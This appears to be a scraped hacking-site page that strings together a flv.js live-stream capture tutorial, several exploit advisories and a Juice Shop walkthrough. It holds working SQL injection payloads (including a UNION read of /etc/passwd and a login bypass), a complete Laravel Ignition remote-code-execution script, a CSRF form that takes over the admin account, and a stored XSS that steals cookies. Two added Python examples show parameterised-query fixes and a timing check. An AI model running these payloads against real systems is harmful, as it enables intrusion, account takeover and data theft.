flv.js does only one thing: after receiving FLV audio/video data, it demuxes the FLV container in pure JavaScript, repackages the frames as fragmented MP4, and feeds them to the native HTML5 video tag through the Media Source Extensions API. (HTML5 natively supports only mp4/webm playback, not FLV.)
Code Example
First, include flv.js:
<script src="https://cdn.bootcss.com/flv.js/1.3.3/flv.js"></script>

The HTML code is as follows:

<video width="300px" height="400px" id="videoElement" controls></video>
<script>
    // flv.js depends on Media Source Extensions; do nothing on browsers without them
    if (flvjs.isSupported()) {
        var videoElement = document.getElementById('videoElement');
        var flvPlayer = flvjs.createPlayer({
            type: 'flv',
            // the FLV pull address captured with the traffic analysis tool above
            url: 'https://pull-f3.douyincdn.com/third/stream-111864726937404075_hd.flv?abr_pts=-1800'
        });
        flvPlayer.attachMediaElement(videoElement);
        flvPlayer.load();
        flvPlayer.play();
    }
</script>

The effect is as follows:
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028190554.png?x-oss-process=style/gzh
Capturing a camera live stream
Cameras at tourist attractions are also often used for live broadcasts. How is that done?
Here we take a home TP-Link camera as an example.
Share the device from the camera app, then capture the live stream.
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028191837.png?x-oss-process=style/gzh
Capture the packets:
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028191954.png?x-oss-process=style/gzh
Test:
http://xiaoyaozi666.oss-cn-beijing.aliyuncs.com/image_20221028192206.png?x-oss-process=style/gzh
Summary
In this issue we explained how to capture live video streams. The principle is very simple: capture the traffic and filter for the live-stream protocols, flv and m3u8.
HireHackking

Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection

# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
# Date: 08-01-2021
# Exploit Author: Jaimin Gondaliya
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://www.prestashop.com/en/download
# Version: Prestashop CMS - 1.7.7.0
# Tested on: Windows 10

Parameter: id_product

Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

Exploit:
http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)
HireHackking
# Exploit Title: Cemetery Mapping and Information System 1.0 - Multiple SQL Injections
# Exploit Author: Mesut Cetin
# Date: 2021-01-12
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Vulnerable parameter: "Search" bar (POST method)
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0

SQL Injection is a type of injection attack that makes it possible to execute malicious SQL statements. Because user input is not sanitized, in this case the attacker can retrieve the entire SQL database.

Explanation:

The script "person.php" takes user input from the search bar at line 45 ("$_POST['search']") and uses it without any sanitization in the following SQL statement (lines 46-49):

$sql = "SELECT * FROM tblpeople WHERE FNAME LIKE '%".$search."%'";
$mydb->setQuery($sql);
$cur = $mydb->executeQuery();
$numrows = $mydb->num_rows($cur);//get the number of count

A single quote (') in the search bar at http://localhost/CemeteryMapping/index.php?q=person results in SQL syntax errors.

Proof of Concept:

Since the PHP code lacks sanitization of the user input, several kinds of SQL injection can be used.

1. Boolean-based SQL injection

Send a POST request to /CemeteryMapping/index.php?q=person with the payload ' or 1=1 -- :

search=' or 1=1 --

2. Union-based SQL injection

To retrieve sensitive files like /etc/passwd, use the following payload in the search bar (POST request to http://localhost/CemeteryMapping/index.php?q=person):

search=' UNION SELECT NULL,load_file('/etc/passwd'),NULL,NULL,NULL,NULL,NULL-- -

Note that load_file() only returns data when the MySQL account has the FILE privilege and secure_file_priv does not restrict the path; otherwise the column comes back NULL.

If you want to enumerate the target system further, replace "load_file('/etc/passwd')" with one of the following MySQL expressions:

@@hostname : Current Hostname
@@tmpdir : Temp Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : Current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current System User
session_user() : Session User
@@GLOBAL.have_symlink : Check if symlink is enabled or disabled
@@GLOBAL.have_ssl : Check if SSL is available or not

3. Time-based SQL injection

For time-based SQL injection, use the payload:

' AND (SELECT 2634 FROM (SELECT(SLEEP(5)))muaN)-- -

Mitigation:

SQL injection can be prevented by using prepared statements and parameterized queries.
HireHackking

Online Movie Streaming 1.0 - Admin Authentication Bypass

# Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass
# Exploit Author: Richard Jones
# Date: 2021-01-13
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
# Exploit URL: http://TARGET/onlinemovies/Plogin.php

POST /onlinemovies/Plogin.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
Origin: http://TARGET
Connection: close
Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj
Upgrade-Insecure-Requests: 1

mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=
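The two PHP applications above (the Cemetery Mapping search and the Online Movie Streaming login) fail for the same reason: user input is concatenated into the SQL text. The following is an added example, not code from either application, that rebuilds both patterns in Python on an in-memory SQLite database and places each beside the parameterised form that the Cemetery advisory names as the mitigation. Table names, rows and the password are constructed; the payloads are the advisories' own, URL-decoded (SQLite has no load_file(), so the UNION payload reads a column from another table instead).

```python
"""The search and login injections above, rebuilt next to their fixed forms.

Added example; it is not code from either vulnerable application. Schema,
rows and the password are constructed for the example (the password is
stored in clear only to keep the example short).
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema with one table per vulnerable query."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tblpeople (id INTEGER PRIMARY KEY, FNAME TEXT);
        INSERT INTO tblpeople (FNAME) VALUES ('Alice'), ('Bob');
        CREATE TABLE users (id INTEGER PRIMARY KEY, mail TEXT, pass TEXT);
        INSERT INTO users (mail, pass) VALUES ('admin@a.com', 'S3cret!');
    """)
    return conn


def search_vulnerable(conn, search: str) -> list:
    """Same shape as person.php: the user string is spliced into the SQL text."""
    sql = "SELECT FNAME FROM tblpeople WHERE FNAME LIKE '%" + search + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, search: str) -> list:
    """The wildcards go into the bound value; the driver treats it as data only."""
    sql = "SELECT FNAME FROM tblpeople WHERE FNAME LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + search + "%",))]


def login_vulnerable(conn, mail: str, password: str):
    """Same shape as Plogin.php. Returns the matched account, or None."""
    sql = f"SELECT mail FROM users WHERE mail='{mail}' AND pass='{password}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, mail: str, password: str):
    """Parameterised: the payload is compared as a literal string and fails."""
    sql = "SELECT mail FROM users WHERE mail=? AND pass=?"
    row = conn.execute(sql, (mail, password)).fetchone()
    return row[0] if row else None


# UNION payload in the shape of the Cemetery advisory. The trailing "-- "
# comments out the closing %' that person.php appends.
UNION_PAYLOAD = "xyz' UNION SELECT pass FROM users -- "
# Online Movie Streaming payload, URL-decoded: pass=ad`'+or+1=1+--+-a
# The quote closes the pass literal, "or 1=1" makes the WHERE true for
# every row, and "-- " comments out the rest of the statement.
BYPASS_PASSWORD = "ad`' or 1=1 -- -a"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable search:", search_vulnerable(db, UNION_PAYLOAD))
    print("safe search:      ", search_safe(db, UNION_PAYLOAD))
    print("vulnerable login: ", login_vulnerable(db, "admin@a.com", BYPASS_PASSWORD))
    print("safe login:       ", login_safe(db, "admin@a.com", BYPASS_PASSWORD))
```

The parameterised versions are not "escaping": the driver sends the SQL text and the values separately, so there is no string in which a quote could change the statement's structure. In PHP the same shape is a PDO prepared statement with bound parameters.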
HireHackking

Online Shopping Cart System 1.0 - 'id' SQL Injection

# Exploit Title: Online Shopping Cart System 1.0 - 'id' SQL Injection
# Date: 14.1.2021
# Exploit Author: Aydın Baran Ertemir
# Vendor Homepage: https://www.sourcecodester.com/php/14668/online-shopping-cart-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14668&title=Online+Shopping+Cart+System+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Kali Linux

Use SQLMAP:

sqlmap -u "localhost/cart_remove.php?id=1" --dbs --batch --level 3 --risk 3
HireHackking

Laravel 8.4.2 debug mode - Remote code execution

# Exploit Title: Laravel 8.4.2 debug mode - Remote code execution
# Date: 1.14.2021
# Exploit Author: SunCSR Team
# Vendor Homepage: https://laravel.com/
# References:
# https://www.ambionics.io/blog/laravel-debug-rce
# https://viblo.asia/p/6J3ZgN8PKmB
# Version: <= 8.4.2
# Tested on: Ubuntu 18.04 + nginx + php 7.4.3
# Github POC: https://github.com/khanhnv-2091/laravel-8.4.2-rce

#!/usr/bin/env python3
import requests, sys, re, os

header = {
    "Accept": "application/json"
}

# Ignition's MakeViewVariableOptionalSolution calls file_get_contents()/file_put_contents()
# on the attacker-controlled viewFile, which is what lets php:// and phar:// wrappers in.
data = {
    "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
    "parameters": {
        "variableName": "cm0s",
        "viewFile": ""
    }
}


def clear_log(url='', viewFile=''):
    # Rewrite the log through base64-decode filters until almost nothing survives,
    # so the log can be turned into a clean PHAR afterwards.
    global data
    data['parameters']['viewFile'] = viewFile
    while (requests.post(url=url, json=data, headers=header, verify=False).status_code != 200):
        pass
    requests.post(url=url, json=data, headers=header, verify=False)
    requests.post(url=url, json=data, headers=header, verify=False)


def create_payload(url='', viewFile=''):
    # A non-existent viewFile makes Ignition log an error line containing the
    # string we pass, which is how the encoded PHAR lands in laravel.log.
    global data
    data['parameters']['viewFile'] = viewFile
    resp = requests.post(url=url, json=data, headers=header, verify=False)
    if resp.status_code == 500 and f'file_get_contents({viewFile})' in resp.text:
        return True
    return False


def convert(url='', viewFile=''):
    # Apply the decode chain to the log file in place; 200 means the filters ran.
    global data
    data['parameters']['viewFile'] = viewFile
    resp = requests.post(url=url, json=data, headers=header, verify=False)
    if resp.status_code == 200:
        return True
    return False


def exploited(url='', viewFile=''):
    # Reading the log through phar:// deserializes its metadata and fires the
    # Monolog gadget; the command output is echoed back in the error body.
    global data
    data['parameters']['viewFile'] = viewFile
    resp = requests.post(url=url, json=data, headers=header, verify=False)
    if resp.status_code == 500 and 'cannot be empty' in resp.text:
        m = re.findall(r'\{(.|\n)+\}((.|\n)*)', resp.text)
        print()
        print(m[0][1])


def generate_payload(command='', padding=0):
    # Build a Monolog RCE PHAR with phpggc, base64 it, and quote each character
    # as "X=00" (quoted-printable UTF-16LE) so it survives the log's decode chain.
    if '/' in command:
        command = command.replace('/', '\\/')
    command = command.replace('\'', '\\\'')
    os.system(r'''php -d'phar.readonly=0' ./phpggc/phpggc monolog/rce1 system '%s' --phar phar -o php://output | base64 -w0 | sed -E 's/./\0=00/g' > payload.txt'''%(command))
    payload = ''
    with open('payload.txt', 'r') as fp:
        payload = fp.read()
    payload = payload.replace('==', '=3D=')
    # Padding keeps the decoded log length a multiple the base64 filter accepts.
    for i in range(padding):
        payload += '=00'
    os.system('rm -rf payload.txt')
    return payload


def main():
    if len(sys.argv) < 4:
        print('Usage: %s url path-log command\n'%(sys.argv[0]))
        print('\tEx: %s http(s)://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log \'id\''%(sys.argv[0]))
        exit(1)

    if not os.path.isfile('./phpggc/phpggc'):
        print('Phpggc not found!')
        print('Run command: git clone https://github.com/ambionics/phpggc.git')
        os.system('git clone https://github.com/ambionics/phpggc.git')

    url = sys.argv[1]
    path_log = sys.argv[2]
    command = sys.argv[3]
    padding = 0
    payload = generate_payload(command, padding)
    if not payload:
        print('Generate payload error!')
        exit(1)

    # Always end up with scheme + host + Ignition's solution endpoint.
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    url = url.rstrip('/') + '/_ignition/execute-solution'

    print('\nExploit...')
    clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log))
    create_payload(url, 'AA')
    create_payload(url, payload)
    while (not convert(url, 'php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=%s'%(path_log))):
        clear_log(url, 'php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s'%(path_log))
        create_payload(url, 'AA')
        padding += 1
        payload = generate_payload(command, padding)
        create_payload(url, payload)
    exploited(url, 'phar://%s'%(path_log))


if __name__ == '__main__':
    main()
HireHackking

OWASP Juice Shop (2) - one-star challenges ⭐

In the previous article we covered the installation of OWASP Juice Shop. This article follows the walkthrough and clears the challenges one by one, starting with the one-star difficulty.
Bonus Payload
Description: Use the bonus payload in the DOM XSS challenge.
Payload: paste the following code into the search box.
<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>
DOM XSS
Description: Perform a DOM-based XSS attack.
Payload (enter it in the search box):
<iframe src="javascript:alert(`xss`)">
Confidential Files
Description: Access a confidential document.
Click "About Us" and find the hyperlink on the page. Click it and capture the request in Burp.

Modify the URL around the ftp path and the following file listing is shown.
Open each file in turn and the challenge is solved.
Bully Chatbot
This challenge is simple: chat with the bot and obtain a discount coupon. When the message you send mentions a code, the bot will send you a coupon.
Exposed Metrics
Description: Find the endpoint where the backend exposes server metrics for common monitoring software.
The official documentation gives the default backend entry point (localhost:3000/metrics).
Missing Encoding
Description: Retrieve the photo of Bjoern's cat in "melee combat mode".
Open the photo wall and one image fails to load. Inspecting the element shows the image tag is <img _ngcontent-utp-c241="" class="image" src="assets/public/images/uploads/-#zatschi-#whoneedsfourlegs-1572600969477.jpg" alt="#zatschi #whoneedsfourlegs">
The image does not load because the URL contains a character with special meaning: the browser treats # as the start of the URL fragment, so the path is cut off before the file name and the server is asked for the wrong resource. Percent-encode each # in the URL as %23 and the image loads.
Outdated Allowlist
Search the JavaScript files for the keyword redirect.
Then just visit the URL you find.
Repetitive Registration
On the registration page, inspect the button element and delete disabled="true". Now enter only the user name, leave the other fields empty, and the registration goes through.
Zero Stars
On the customer feedback page, inspect the submit button element and remove disabled="true".
Now only the captcha needs to be filled in to submit.
HireHackking
# Exploit Title: Online Hotel Reservation System 1.0 - 'id' Time-based SQL Injection
# Exploit Author: Mesut Cetin
# Date: 2021-01-14
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0

######## Description ########

Vulnerable to SQL Injection.

// vulnerable parameter at include/room.php, line 25:
$mydb->setQuery("SELECT * FROM ".self::$tbl_name." Where `ROOMID`= {id} LIMIT 1");

######## Proof of Concept #########

The 'id' parameter at http://localhost/marimar/admin/mod_room/index.php?view=edit&id=11 is vulnerable to time-based SQL injection.

Payload: (select*from(select(sleep(10)))a)

Proof of Concept:
http://localhost/marimar/admin/mod_room/index.php?view=edit&id=(select*from(select(sleep(10)))a)
HireHackking
# Exploit Title: Online Hotel Reservation System 1.0 - Cross-site request forgery (CSRF)
# Exploit Author: Mesut Cetin
# Date: 2021-01-14
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0

######## Description ########

Vulnerable to Cross-site request forgery (CSRF), which can lead to full account takeover of the Administrator account.

######## Proof of Concept #########

Send the victim the following PoC:

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/marimar/admin/mod_users/controller.php?action=edit" method="POST">
      <input type="hidden" name="USERID" value="1" />
      <input type="hidden" name="UNAME" value="Anonymous" />
      <input type="hidden" name="USERNAME" value="admin" />
      <input type="hidden" name="deptid" value="" />
      <input type="hidden" name="UPASS" value="admin" /> <!-- change this to the new password you wish -->
      <input type="hidden" name="ROLE" value="Administrator" />
      <input type="hidden" name="deptid" value="" />
      <input type="hidden" name="PHONE" value="912852478" />
      <input type="hidden" name="save" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
HireHackking
# Exploit Title: Online Hotel Reservation System 1.0 - 'person' time-based SQL Injection
# Exploit Author: Mesut Cetin
# Date: 2021-01-15
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0

######## Description ########

The 'person' parameter is vulnerable to time-based SQL Injection.

######## Proof of Concept #######

Payload: (select*from(select(sleep(10)))a)

Using Burp Suite, send the following POST request:

POST /marimar/index.php?p=booking HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://localhost
Connection: close
Referer: http://localhost/marimar/index.php?p=booking
Cookie: PHPSESSID=cf40af0022f401c8cfd0be17fc00a6cc
Upgrade-Insecure-Requests: 1

arrival=01%2F19%2F2021&departure=01%2F11%2F2021&person=(select*from(select(sleep(10)))a)&accomodation=0
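The Prestashop advisory and the two Hotel Reservation advisories above each prove their time-based injection with a single request carrying SLEEP(5) or SLEEP(10). A practitioner normally wants evidence that the delay comes from the payload and not from network jitter. The following is an added example, not code from any of the advisories, that sends a baseline value and the injected value several times each and compares median response times. `send` is whatever function issues the request and returns its elapsed seconds; the two fake targets are constructed stand-ins so the block runs offline, and `sleep_payload` builds the two payload shapes quoted in the advisories.

```python
"""Confirm a time-based blind SQL injection with repeated, compared timings.

Added example; it is not code from the advisories above. The two fake_*
targets are constructed stand-ins for a real endpoint.
"""
import re
import statistics
import time
from typing import Callable

SLEEP_RE = re.compile(r"sleep\((\d+(?:\.\d+)?)\)", re.IGNORECASE)


def sleep_payload(base_value: str, seconds: float, style: str = "subquery") -> str:
    """Return the injected parameter value for the given payload shape."""
    if style == "subquery":
        # id=(select*from(select(sleep(N)))a), as in the Hotel Reservation PoCs
        return f"(select*from(select(sleep({seconds})))a)"
    if style == "and":
        # id=1 AND (SELECT 3875 FROM (SELECT(SLEEP(N)))xoOt), as in the Prestashop PoC
        return f"{base_value} AND (SELECT 3875 FROM (SELECT(SLEEP({seconds})))xoOt)"
    raise ValueError(f"unknown payload style: {style}")


def is_time_based_injectable(send: Callable[[str], float], base_value: str,
                             delay: float, samples: int = 3,
                             style: str = "subquery") -> bool:
    """True when injected requests take roughly `delay` seconds longer than baseline.

    Medians rather than single samples: one slow baseline request cannot mask
    the delay and one slow injected request cannot fake it. The 0.8 factor
    tolerates a timer that fires slightly early while still rejecting jitter.
    """
    payload = sleep_payload(base_value, delay, style)
    baseline = statistics.median(send(base_value) for _ in range(samples))
    injected = statistics.median(send(payload) for _ in range(samples))
    return injected - baseline >= 0.8 * delay


def fake_vulnerable_target(param_value: str) -> float:
    """Constructed stand-in for a vulnerable endpoint. The value is interpolated
    into the query, so MySQL would really execute SLEEP(n); here we just sleep."""
    start = time.perf_counter()
    match = SLEEP_RE.search(param_value)
    if match:
        time.sleep(float(match.group(1)))
    return time.perf_counter() - start


def fake_patched_target(param_value: str) -> float:
    """Constructed stand-in for a parameterised endpoint. The value is bound as
    data, nothing inside it is executed, so the response time never changes."""
    start = time.perf_counter()
    _ = param_value  # would be handed to cursor.execute(sql, (param_value,))
    return time.perf_counter() - start


if __name__ == "__main__":
    # A short delay keeps the demo quick; against a real target use 5-10 s.
    print("vulnerable:", is_time_based_injectable(fake_vulnerable_target, "11", 0.2))
    print("patched:   ", is_time_based_injectable(fake_patched_target, "11", 0.2))
    print("and-style: ", is_time_based_injectable(fake_vulnerable_target, "1", 0.2, style="and"))
```

Against a live target, `send` wraps the HTTP call (for example a `requests` GET or POST) and returns `response.elapsed.total_seconds()`; set the client timeout comfortably above `delay`, otherwise the injected requests are cut off and counted as fast. SLEEP() is MySQL/MariaDB syntax, matching the MySQLi backends in these advisories.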
HireHackking
# Exploit Title: Alumni Management System 1.0 - "Last Name field in Registration page" Stored XSS
# Exploit Author: Siva Rajendran
# Date: 2020-12-31
# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
# Affected Version: Version 1
# Tested on: Windows 10, Firefox Version 84.0

Step 1. Go to the sign up page.
Step 2. In the "Last Name" field, use the following XSS payload as the name and click on save:
"><img src=xx onerror=alert(document.cookie)>
Step 3. This triggers the stored XSS payload in the admin panel's users tab once the admin logs into the application to verify the registered user's email address. The attacker steals the admin session cookie.